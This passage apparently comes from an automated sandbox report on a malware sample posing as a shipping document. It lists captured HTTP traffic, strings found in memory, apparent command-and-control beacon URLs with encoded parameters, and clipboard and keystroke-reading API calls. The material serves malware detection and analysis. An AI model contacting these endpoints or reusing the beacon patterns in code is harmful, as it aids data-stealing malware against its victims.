6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:53:22 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:53:25 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:53:28 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:53:30 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: AhEyCWkdTLz.exe, 00000005.00000002.874124663.0000000000B59000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hasthosting.xyz
                Source: AhEyCWkdTLz.exe, 00000005.00000002.874124663.0000000000B59000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hasthosting.xyz/04fb/
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000004F12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hasthosting.xyz/04fb/?mFptYb=EDSq5eKeQ/yn
                Source: AtBroker.exe, 00000004.00000002.874829576.0000000061EBE000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: AtBroker.exe, 00000004.00000002.874304385.0000000002BE4000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003784000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.436603581.0000000001284000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://00808.vip/
                Source: AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.css
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.css
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.css
                Source: AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.css
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.png
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.png
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.png
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.png
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.png
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpeg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.js
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.js
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.js
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281533072611.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281606448510.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281756134546.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111316162395.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111418363409.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111532064388.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111554188180.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111602227556.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111650528174.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111653519935.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111718494999.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111820293498.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111842165995.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121050155085.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121111152889.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121114111017.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121118333732.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121130140569.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121333505679.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121337456585.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121352209002.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121427539351.jpg
                Source: AtBroker.exe, 00000004.00000002.874664926.0000000005080000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874304385.00000000033BE000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003F5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpg
                Source: AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=
                Source: AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                Source: AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: AtBroker.exe, 00000004.00000003.424626988.000000000050C000.00000004.00000020.00020000.00000000.sdmp, 1453h-8L.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 1453h-8L.4.drString found in binary or memory: https://www.google.com/favicon.ico
                Source: AtBroker.exe, 00000004.00000002.874304385.0000000003A06000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.00000000045A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kghjkx.xyz/usop/?mFptYb=3GbX3siKa3fb4xoywmO7dLt2gtHeawz6Sbk2xDjabsziN9g8eu79XBc6hQhNCIiJ
                Source: AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land
                Source: AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_lan
                Source: AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land_h
                Source: AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: AtBroker.exe, 00000004.00000002.874304385.000000000309A000.00000004.10000000.00040000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874283085.0000000003C3A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.marketplacer.top&amp;reg_source=parking_auto
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A2407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A2407C
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A2427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00A2427A
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A2407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A2407C
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00A1003A
